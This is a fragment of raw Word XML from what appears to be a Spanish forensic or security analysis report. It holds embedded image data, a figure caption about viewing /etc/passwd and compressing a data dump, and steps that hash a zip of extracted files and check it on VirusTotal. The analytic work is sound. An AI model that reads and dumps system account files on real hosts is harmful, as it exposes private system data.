NFno9i9diWbkozpPigAs0bqvDznAhHR8cREn2Dr&#10;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&#10;kP/5yx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Hz5rikoEAAABDAAADgAAAAAAAAAAAAAAAAA6AgAAZHJzL2Uyb0RvYy54bWxQSwECLQAKAAAA&#10;AAAAACEA7T2mElkxAABZMQAAFAAAAAAAAAAAAAAAAACwBgAAZHJzL21lZGlhL2ltYWdlMS5wbmdQ&#10;SwECLQAKAAAAAAAAACEAaeryKJ1pAQCdaQEAFAAAAAAAAAAAAAAAAAA7OAAAZHJzL21lZGlhL2lt&#10;YWdlMi5wbmdQSwECLQAUAAYACAAAACEAgN6wpN8AAAAHAQAADwAAAAAAAAAAAAAAAAAKogEAZHJz&#10;L2Rvd25yZXYueG1sUEsBAi0AFAAGAAgAAAAhAC5s8ADFAAAApQEAABkAAAAAAAAAAAAAAAAAFqMB&#10;AGRycy9fcmVscy9lMm9Eb2MueG1sLnJlbHNQSwUGAAAAAAcABwC+AQAAEqQBAAAA&#10;">
                <v:group id="_x0000_s1132" style="position:absolute;width:31800;height:14839" coordsize="33164,15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98XyQAAAOIAAAAPAAAAZHJzL2Rvd25yZXYueG1sRI/NasJA&#10;FIX3Bd9huAV3dRKDoaaOIqLiQoSqULq7ZK5JMHMnZMYkvn1nUXB5OH98i9VgatFR6yrLCuJJBII4&#10;t7riQsH1svv4BOE8ssbaMil4koPVcvS2wEzbnr+pO/tChBF2GSoovW8yKV1ekkE3sQ1x8G62NeiD&#10;bAupW+zDuKnlNIpSabDi8FBiQ5uS8vv5YRTse+zXSbztjvfb5vl7mZ1+jjEpNX4f1l8gPA3+Ff5v&#10;H7SCdJ6kSZTMAkRACjggl38AAAD//wMAUEsBAi0AFAAGAAgAAAAhANvh9svuAAAAhQEAABMAAAAA&#10;AAAAAAAAAAAAAAAAAFtDb250ZW50X1R5cGVzXS54bWxQSwECLQAUAAYACAAAACEAWvQsW78AAAAV&#10;AQAACwAAAAAAAAAAAAAAAAAfAQAAX3JlbHMvLnJlbHNQSwECLQAUAAYACAAAACEAV9PfF8kAAADi&#10;AAAADwAAAAAAAAAAAAAAAAAHAgAAZHJzL2Rvd25yZXYueG1sUEsFBgAAAAADAAMAtwAAAP0CAAAA&#10;AA==&#10;">
                  <v:shape id="Imagen 84" o:spid="_x0000_s1133" type="#_x0000_t75" alt="Imagen de la pantalla de un celular con la imagen de un video juego&#10;&#10;Descripción generada automáticamente con confianza baja" style="position:absolute;left:20832;top:159;width:12332;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9zyQAAAOMAAAAPAAAAZHJzL2Rvd25yZXYueG1sRE9PS8Mw&#10;FL8LfofwhF3GlnbTOWvTMQeCMD1YvXh7NM+02LyEJnb12xth4PH9/r9yN9lejDSEzrGCfJmBIG6c&#10;7tgoeH97XGxBhIissXdMCn4owK66vCix0O7ErzTW0YgUwqFABW2MvpAyNC1ZDEvniRP36QaLMZ2D&#10;kXrAUwq3vVxl2UZa7Dg1tOjp0FLzVX9bBbZfz3Nv+WiOZnr28+bw8PJRKzW7mvb3ICJN8V98dj/p&#10;ND9f3d5c53fbNfz9lACQ1S8AAAD//wMAUEsBAi0AFAAGAAgAAAAhANvh9svuAAAAhQEAABMAAAAA&#10;AAAAAAAAAAAAAAAAAFtDb250ZW50X1R5cGVzXS54bWxQSwECLQAUAAYACAAAACEAWvQsW78AAAAV&#10;AQAACwAAAAAAAAAAAAAAAAAfAQAAX3JlbHMvLnJlbHNQSwECLQAUAAYACAAAACEAv7HPc8kAAADj&#10;AAAADwAAAAAAAAAAAAAAAAAHAgAAZHJzL2Rvd25yZXYueG1sUEsFBgAAAAADAAMAtwAAAP0CAAAA&#10;AA==&#10;">
                    <v:imagedata r:id="rId173" o:title="Imagen de la pantalla de un celular con la imagen de un video juego&#10;&#10;Descripción generada automáticamente con confianza baja"/>
                  </v:shape>
                  <v:shape id="Imagen 83" o:spid="_x0000_s1134" type="#_x0000_t75" alt="Texto&#10;&#10;Descripción generada automáticamente" style="position:absolute;width:19481;height:1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sBpygAAAOIAAAAPAAAAZHJzL2Rvd25yZXYueG1sRI9BawIx&#10;FITvBf9DeIIXqYlarV2NUpRSoV7cFs+Pzevu4uZlu4ma/vumUOhxmJlvmNUm2kZcqfO1Yw3jkQJB&#10;XDhTc6nh4/3lfgHCB2SDjWPS8E0eNuve3Qoz4258pGseSpEg7DPUUIXQZlL6oiKLfuRa4uR9us5i&#10;SLIrpenwluC2kROl5tJizWmhwpa2FRXn/GI1nO1pt4/D+vgWD7mncvj6dZGs9aAfn5cgAsXwH/5r&#10;742G+eNUPT1M1Ax+L6U7INc/AAAA//8DAFBLAQItABQABgAIAAAAIQDb4fbL7gAAAIUBAAATAAAA&#10;AAAAAAAAAAAAAAAAAABbQ29udGVudF9UeXBlc10ueG1sUEsBAi0AFAAGAAgAAAAhAFr0LFu/AAAA&#10;FQEAAAsAAAAAAAAAAAAAAAAAHwEAAF9yZWxzLy5yZWxzUEsBAi0AFAAGAAgAAAAhAPKKwGnKAAAA&#10;4gAAAA8AAAAAAAAAAAAAAAAABwIAAGRycy9kb3ducmV2LnhtbFBLBQYAAAAAAwADALcAAAD+AgAA&#10;AAA=&#10;">
                    <v:imagedata r:id="rId174" o:title="Texto&#10;&#10;Descripción generada automáticamente"/>
                  </v:shape>
                </v:group>
                <v:shape id="_x0000_s1135" type="#_x0000_t202" style="position:absolute;left:33634;top:5009;width:20288;height:6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9WDxwAAAOIAAAAPAAAAZHJzL2Rvd25yZXYueG1sRE/Pa8Iw&#10;FL4P9j+EN/AiM21hZXZG2dSBBz3oxPOjeWvLmpeSRFv/eyMIO358v2eLwbTiQs43lhWkkwQEcWl1&#10;w5WC48/36zsIH5A1tpZJwZU8LObPTzMstO15T5dDqEQMYV+ggjqErpDSlzUZ9BPbEUfu1zqDIUJX&#10;Se2wj+GmlVmS5NJgw7Ghxo6WNZV/h7NRkK/cud/zcrw6rre466rs9HU9KTV6GT4/QAQawr/44d7o&#10;OD+fZmmeTt/gfilikPMbAAAA//8DAFBLAQItABQABgAIAAAAIQDb4fbL7gAAAIUBAAATAAAAAAAA&#10;AAAAAAAAAAAAAABbQ29udGVudF9UeXBlc10ueG1sUEsBAi0AFAAGAAgAAAAhAFr0LFu/AAAAFQEA&#10;AAsAAAAAAAAAAAAAAAAAHwEAAF9yZWxzLy5yZWxzUEsBAi0AFAAGAAgAAAAhAKMT1YPHAAAA4gAA&#10;AA8AAAAAAAAAAAAAAAAABwIAAGRycy9kb3ducmV2LnhtbFBLBQYAAAAAAwADALcAAAD7AgAAAAA=&#10;" stroked="f">
                  <v:textbox inset="0,0,0,0">
                    <w:txbxContent>
                      <w:p w14:paraId="4F0BFD12" w14:textId="2F1699E5" w:rsidR="00CF2570" w:rsidRPr="00A6304B" w:rsidRDefault="00CF2570" w:rsidP="00CF2570">
                        <w:pPr>
                          <w:pStyle w:val="Descripcin"/>
                          <w:rPr>
                            <w:rFonts w:cs="Arial"/>
                            <w:noProof/>
                          </w:rPr>
                        </w:pPr>
                        <w:r>
                          <w:t xml:space="preserve">Ilustración </w:t>
                        </w:r>
                        <w:fldSimple w:instr=" SEQ Ilustración \* ARABIC ">
                          <w:r w:rsidR="00117A4E">
                            <w:rPr>
                              <w:noProof/>
                            </w:rPr>
                            <w:t>35</w:t>
                          </w:r>
                        </w:fldSimple>
                        <w:r>
                          <w:t xml:space="preserve">: </w:t>
                        </w:r>
                        <w:bookmarkStart w:id="91" w:name="_Toc155782602"/>
                        <w:r w:rsidRPr="001F64A9">
                          <w:t xml:space="preserve">Archivo </w:t>
                        </w:r>
                        <w:r w:rsidR="00501A15">
                          <w:t>/etc/</w:t>
                        </w:r>
                        <w:r w:rsidRPr="001F64A9">
                          <w:t>passwd y comprimiendo volcado.</w:t>
                        </w:r>
                        <w:bookmarkEnd w:id="91"/>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:shape>
                <w10:wrap type="square" anchorx="margin"/>
              </v:group>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="000C4414" w:rsidRPr="001C6280">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="22"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>wordpress-4.9.8.tar.gz</w:t>
      </w:r>
      <w:r w:rsidR="001C6280" w:rsidRPr="001C6280">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EC79288" w14:textId="090942BB" w:rsidR="000C4414" w:rsidRPr="000C4414" w:rsidRDefault="000C4414" w:rsidP="000C4414">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000C4414">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Por </w:t>
      </w:r>
      <w:r w:rsidR="001C2D6F" w:rsidRPr="000C4414">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>último,</w:t>
      </w:r>
      <w:r w:rsidRPr="000C4414">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> voy a </w:t>
      </w:r>
      <w:r w:rsidR="00FB41B7" w:rsidRPr="000C4414">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>pasar</w:t>
      </w:r>
      <w:r w:rsidRPr="000C4414">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> por VirusTotal los archivos extraídos, para ello los comprimo en un .zip y ese archivo zip, lo pasaré por </w:t>
      </w:r>
      <w:hyperlink r:id="rId175" w:history="1">
        <w:r w:rsidR="00FB41B7" w:rsidRPr="00FB41B7">
          <w:rPr>
            <w:rStyle w:val="Hipervnculo"/>
            <w:rFonts w:cs="Arial"/>
            <w:szCs w:val="22"/>
          </w:rPr>
          <w:t>virustotal.com</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="000C4414">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EA695C6" w14:textId="223E75F7" w:rsidR="000C4414" w:rsidRPr="000C4414" w:rsidRDefault="000C4414" w:rsidP="000C4414">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000C4414">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Primero de todo vamos a hacer un sha256sum para corroborar posteriormente que el archivo subido en cuestión tiene el mismo hash</w:t>
      </w:r>
      <w:r w:rsidR="00D16863">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="00D16863">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> XE "</w:instrText>
      </w:r>
      <w:r w:rsidR="00D16863" w:rsidRPr="00D308D3">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
        <w:instrText>Hash: Función criptográfica que convierte cualquier bloque de datos en una cadena de longitud fija, que actúa como un "huella digital" de los datos.</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0C4414">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">. Para ello ejecutaremos en </w:t>
      </w:r>
      <w:r w:rsidR="00E15DB8" w:rsidRPr="000C4414">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Ubuntu</w:t>
      </w:r>
      <w:r w:rsidR="00D16863">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="00D16863">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> XE "</w:instrText>
      </w:r>
      <w:r w:rsidR="00D16863" w:rsidRPr="00D308D3">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
        <w:instrText>Ubuntu: Una distribución de Linux basada en Debian, popular por su facilidad de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0C4414">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> el comando </w:t>
      </w:r>
      <w:r w:rsidRPr="001C2D6F">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="22"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>sha256sum /home/jrodg85/volcado-datos.zip</w:t>
      </w:r>
      <w:r w:rsidRPr="000C4414">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>, de este modo obtenemos que el hash</w:t>
      </w:r>
      <w:r w:rsidR="00D16863">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="00D16863">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> XE "</w:instrText>
      </w:r>
      <w:r w:rsidR="00D16863" w:rsidRPr="00D308D3">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
        <w:instrText>Hash: Función criptográfica que convierte cualquier bloque de datos en una cadena de longitud fija, que actúa como un "huella digital" de los datos.</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0C4414">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> en sha256 del archivo es </w:t>
      </w:r>
      <w:r w:rsidRPr="001C2D6F">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="22"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>5d842006ca8551f683e78c2b5474eb79145f64eb2167683151b6fadb0bce0062</w:t>
      </w:r>
      <w:r w:rsidR="001C2D6F">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
